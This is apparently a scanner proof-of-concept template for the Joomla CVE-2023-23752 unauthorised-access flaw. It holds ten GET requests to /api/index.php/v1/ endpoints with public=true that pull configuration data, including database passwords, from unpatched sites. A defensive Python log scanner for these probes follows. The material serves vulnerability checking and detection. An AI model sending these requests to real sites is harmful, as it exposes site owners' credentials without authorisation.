Vulnerability Description
Joomla contains an unauthorized access vulnerability: because access restrictions on web service endpoints are improperly enforced, a remote attacker can bypass the security restriction and obtain sensitive information from the web application.
Affected versions: 4.0.0 <= Joomla <= 4.2.7
id: CVE-2023-23752
info:
  name: Joomla未授权访问漏洞(CVE-2023-23752)
  author: daffainfo、m4sk
  severity: critical
  verified: true
  description: |
    Joomla中存在未授权访问漏洞,由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。
    影响版本4.0.0 <= Joomla <= 4.2.7
  reference:
    - https://mp.weixin.qq.com/s/lTdq3-cVTQcSJ3c6G7rn-Q
    - https://cve.report/CVE-2023-23752
    - https://xz.aliyun.com/t/12175
    - https://github.com/Saboor-Hakimi/CVE-2023-23752
rules:
  r0:
    request:
      method: GET
      path: /api/index.php/v1/config/application?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r1:
    request:
      method: GET
      path: /api/index.php/v1/banners?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r2:
    request:
      method: GET
      path: /api/index.php/v1/banners/clients?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r3:
    request:
      method: GET
      path: /api/index.php/v1/banners/categories?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r4:
    request:
      method: GET
      path: /api/index.php/v1/contacts?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r5:
    request:
      method: GET
      path: /api/index.php/v1/contacts/categories?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r6:
    request:
      method: GET
      path: /api/index.php/v1/fields/contacts/contact?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r7:
    request:
      method: GET
      path: /api/index.php/v1/fields/contacts/mail?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r8:
    request:
      method: GET
      path: /api/index.php/v1/fields/contacts/categories?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
  r9:
    request:
      method: GET
      path: /api/index.php/v1/fields/groups/contacts/contact?public=true
      headers:
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9()
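As an added example, not part of the POC above or of any Joomla project code: a Python script that scans web-server access logs for hits on the ten API paths probed by rules r0..r9 with the `public=true` query the POC sends, so a defender can tell whether an instance was probed and whether the probe was answered. It assumes the Apache/nginx "combined" log format; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The ten API paths probed by rules r0..r9 above.
API_PREFIX = "/api/index.php/v1/"
PROBED_PATHS = {API_PREFIX + p for p in (
    "config/application", "banners", "banners/clients", "banners/categories",
    "contacts", "contacts/categories", "fields/contacts/contact",
    "fields/contacts/mail", "fields/contacts/categories",
    "fields/groups/contacts/contact",
)}

# Apache/nginx "combined" access-log format (assumed log format).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def classify(line):
    """Return a finding for a probe of the unauthenticated API, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path not in PROBED_PATHS:
        return None
    # The POC sends public=true; that is the signature of an anonymous API hit.
    if parse_qs(url.query).get("public", [""])[0].lower() != "true":
        return None
    status = int(m.group("status"))
    if status == 200 and url.path.endswith("/config/application"):
        severity = "high"    # config endpoint (holds DB credentials) answered anonymously
    elif status == 200:
        severity = "medium"  # another API listing answered an anonymous request
    else:
        severity = "info"    # probe was rejected; still records who is scanning
    return {"host": m.group("host"), "time": m.group("time"),
            "path": url.path, "status": status, "severity": severity}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2023:12:00:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2023:12:00:02 +0000] "GET /api/index.php/v1/banners?public=true HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2023:12:00:03 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 87 "-" "curl/7.88"',
    '192.0.2.9 - - [10/Mar/2023:12:00:04 +0000] "GET /index.php/component/users/ HTTP/1.1" 200 3012 "-" "Mozilla/5.0"',
]
```

Running `scan(SAMPLE_LOG)` yields one high, one medium and one info finding; a "high" finding on a host running 4.0.0 through 4.2.7 means the configuration endpoint was served to an anonymous client and the database credentials should be treated as exposed.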